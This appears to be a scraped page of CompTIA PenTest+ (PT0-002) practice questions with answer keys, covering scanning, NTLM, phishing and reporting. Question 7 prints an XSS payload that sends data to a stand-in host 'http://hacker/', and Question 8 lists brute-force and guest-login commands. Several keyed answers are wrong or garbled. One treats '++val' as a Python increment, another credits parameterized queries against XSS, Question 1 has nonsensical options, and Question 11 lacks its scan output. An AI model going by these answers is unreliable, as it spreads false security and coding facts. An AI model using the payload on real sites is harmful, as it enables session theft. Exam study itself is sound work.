CompTIA PT0-002 Free Practice Questions

NEW QUESTION 1
You are a penetration tester running port scans on a server. INSTRUCTIONS
Part 1: Given the output, construct the command that was used to generate this output from the available options.
Part 2: Once the command is appropriately constructed, use the given output to identify the potential attack vectors that should be investigated further.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

• A. Yes
• B. Not Mastered

Answer: A

NEW QUESTION 2
A security company has been contracted to perform a scoped insider-threat assessment to try to gain access to the human resources server that houses PII and salary data. The penetration testers have been given an internal network starting position.
Which of the following actions, if performed, would be ethical within the scope of the assessment?

• A. Exploiting a configuration weakness in the SQL database
• B. Intercepting outbound TLS traffic
• C. Gaining access to hosts by injecting malware into the enterprise-wide update server
• D. Leveraging a vulnerability on the internal CA to issue fraudulent client certificates
• E. Establishing and maintaining persistence on the domain controller

Answer: B

NEW QUESTION 3
Which of the following provides a matrix of common tactics and techniques used by attackers along with recommended mitigations?

• A. NIST SP 800-53
• B. OWASP Top 10
• C. MITRE ATT&CK framework
• D. PTES technical guidelines

Answer: C

NEW QUESTION 4
A company hired a penetration-testing team to review the cyber-physical systems in a manufacturing plant. The team immediately discovered the supervisory systems and PLCs are both connected to the company intranet. Which of the following assumptions, if made by the penetration-testing team, is MOST likely to be valid?

• A. PLCs will not act upon commands injected over the network.
• B. Supervisors and controllers are on a separate virtual network by default.
• C. Controllers will not validate the origin of commands.
• D. Supervisory systems will detect a malicious injection of code/commands.

Answer: C

NEW QUESTION 5
Which of the following expressions in Python increase a variableval by one (Choose two.)

• A. val++
• B. +val
• C. val=(val+1)
• D. ++val
• E. val=val++
• F. val+=1

Answer: DF

NEW QUESTION 6
A penetration tester is able to capture the NTLM challenge-response traffic between a client and a server. Which of the following can be done with the pcap to gain access to the server?

• A. Perform vertical privilege escalation.
• B. Replay the captured traffic to the server to recreate the session.
• C. Use John the Ripper to crack the password.
• D. Utilize a pass-the-hash attack.

Answer: D

NEW QUESTION 7
Given the following code:
[removed]var+img=new+Image();img.src=”http://hacker/ + [removed];[removed]
Which of the following are the BEST methods to prevent against this type of attack? (Choose two.)

• A. Web-application firewall
• B. Parameterized queries
• C. Output encoding
• D. Session tokens
• E. Input validation
• F. Base64 encoding

Answer: BE

NEW QUESTION 8
A penetration tester runs a scan against a server and obtains the following output: 21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-12-20 09:23AM 331 index.aspx
| ftp-syst:
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Microsoft Windows Server 2012 Std 3389/tcp open ssl/ms-wbt-server
| rdp-ntlm-info:
| Target Name: WEB3
| NetBIOS_Computer_Name: WEB3
| Product_Version: 6.3.9600
|_ System_Time: 2021-01-15T11:32:06+00:00
8443/tcp open http Microsoft IIS httpd 8.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
Which of the following command sequences should the penetration tester try NEXT?

• A. ftp 192.168.53.23
• B. smbclient \\WEB3\IPC$ -I 192.168.53.23 –U guest
• C. ncrack –u Administrator –P 15worst_passwords.txt –p rdp 192.168.53.23
• D. curl –X TRACE https://192.168.53.23:8443/index.aspx
• E. nmap –-script vuln –sV 192.168.53.23

Answer: A

NEW QUESTION 9
Which of the following are the MOST important items to include in the final report for a penetration test?
(Choose two.)

• A. The CVSS score of the finding
• B. The network location of the vulnerable device
• C. The vulnerability identifier
• D. The client acceptance form
• E. The name of the person who found the flaw
• F. The tool used to find the issue

Answer: CF

NEW QUESTION 10
A penetration tester has been given eight business hours to gain access to a client’s financial system. Which of the following techniques will have the highest likelihood of success?

• A. Attempting to tailgate an employee going into the client's workplace
• B. Dropping a malicious USB key with the company’s logo in the parking lot
• C. Using a brute-force attack against the external perimeter to gain a foothold
• D. Performing spear phishing against employees by posing as senior management

Answer: C

NEW QUESTION 11
The results of an Nmap scan are as follows:

Which of the following would be the BEST conclusion about this device?

• A. This device may be vulnerable to the Heartbleed bug due to the way transactions over TCP/22 handle heartbeat extension packets, allowing attackers to obtain sensitive information from process memory.
• B. This device is most likely a gateway with in-band management services.
• C. This device is most likely a proxy server forwarding requests over TCP/443.
• D. This device may be vulnerable to remote code execution because of a butter overflow vulnerability in the method used to extract DNS names from packets prior to DNSSEC validation.

Answer: A

NEW QUESTION 12
During a penetration-testing engagement, a consultant performs reconnaissance of a client to identify potential targets for a phishing campaign. Which of the following would allow the consultant to retrieve email addresses for technical and billing contacts quickly, without triggering any of the client’s cybersecurity tools? (Choose two.)

• A. Scraping social media sites
• B. Using the WHOIS lookup tool
• C. Crawling the client’s website
• D. Phishing company employees
• E. Utilizing DNS lookup tools
• F. Conducting wardriving near the client facility

Answer: BC

NEW QUESTION 13
A penetration tester received a .pcap file to look for credentials to use in an engagement. Which of the following tools should the tester utilize to open and read the .pcap file?

• A. Nmap
• B. Wireshark
• C. Metasploit
• D. Netcat

Answer: B

NEW QUESTION 14
An Nmap network scan has found five open ports with identified services. Which of the following tools should a penetration tester use NEXT to determine if any vulnerabilities with associated exploits exist on the open ports?

• A. OpenVAS
• B. Drozer
• C. Burp Suite
• D. OWASP ZAP

Answer: A

NEW QUESTION 15
A penetration-testing team is conducting a physical penetration test to gain entry to a building. Which of the following is the reason why the penetration testers should carry copies of the engagement documents with them?

• A. As backup in case the original documents are lost
• B. To guide them through the building entrances
• C. To validate the billing information with the client
• D. As proof in case they are discovered

Answer: D

NEW QUESTION 16
A company conducted a simulated phishing attack by sending its employees emails that included a link to a site that mimicked the corporate SSO portal. Eighty percent of the employees who received the email clicked the link and provided their corporate credentials on the fake site. Which of the following recommendations would BEST address this situation?

• A. Implement a recurring cybersecurity awareness education program for all users.
• B. Implement multifactor authentication on all corporate applications.
• C. Restrict employees from web navigation by defining a list of unapproved sites in the corporate proxy.
• D. Implement an email security gateway to block spam and malware from email communications.

Answer: A

NEW QUESTION 17
......